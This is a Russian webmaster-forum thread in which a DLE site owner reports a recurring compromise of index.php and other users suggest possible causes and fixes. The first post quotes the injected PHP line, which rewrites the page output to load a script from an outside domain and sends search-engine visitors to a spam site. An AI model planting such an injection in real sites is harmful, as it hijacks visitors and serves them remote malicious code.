Форум Практика оптимизации Любые вопросы от новичков по оптимизации

Сторонний код

C
На сайте с 14.08.2011
Offline
0
Cheb
803

постоянно в индексном файле (index.php , движок DLE) внизу страницы появляется код:

echo $tpl->result['main'] = preg_replace('~(<body.*?>)~ism','$1<script src=http://jahpoker.ru/l.js></script>', $tpl->result['main']);
$tpl->global_clear ();
$db->close ();

вместо:

echo $tpl->result['main'];
$tpl->global_clear ();
$db->close ();

все пароли менял много раз, не помогает.... на другой день опять на месте, результат кода - при переходе с яндекса перекидывает на сайт - http://shara.stuff-find-house.ru/results.php?notds=1&query=мойсайт.ru, если просто вбиваешь ссылку, то всё ок...

G2
На сайте с 11.09.2007
Offline
65
geo27
#1

Вариантов несколько у вас стоит кей-логер который отправляет вашу активность кому надо. Один раз на ваше пространство на хосте внедрили скриптик автоматически меняющий эхо. Вариант третий, не думаю что возможен, у хостера у самого вирь живет. Смотрите время изменения страницы. Перекопайте скрипты.

С 14 октября все Google вебмастерам о безопасности Facebook начал тестировать обновленную
C
На сайте с 14.08.2011
Offline
0
Cheb
#2

geo27, а как найти этот кей-логер,или скрипт, где они могут находиться?

G2
На сайте с 11.09.2007
Offline
65
geo27
#3

кейлогер ищем антивирусами, ставим файерволы на максимум с запросом на выход в сеть и смотрим какой процесс ломится и за что он отвечает. А вот скрипт ищите на самом хосте. Если по простому смотрите в папке где скрипты лежат. А если кто-то хитро делал надо спеца нанимать.

Алексей Волин: Россия не Новый аукцион Яндекс Директа Яндекс продолжает улучшать поисковые
promomaniac
На сайте с 10.03.2011
Offline
160
promomaniac
#4

В случае с DLE не удивлюсь, что шелл вшит.

Меня смущает, что колода плохо перетасована, но лишь до тех пор, пока мне не придет хорошая карта. © Джонатан Свифт.
S2
На сайте с 27.04.2009
Offline
77
serg256
#5

Если DLE, то обновление иногда помогает.

C
На сайте с 14.08.2011
Offline
0
Cheb
#6
promomaniac:
В случае с DLE не удивлюсь, что шелл вшит.

два года проблем не было....

Cheb добавил 15.08.2011 в 21:05

serg256, в том то и дело, что с обновлением тоже проблема((((

R
На сайте с 24.01.2008
Offline
180
Алексей
#7

Стучите, поможем!

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий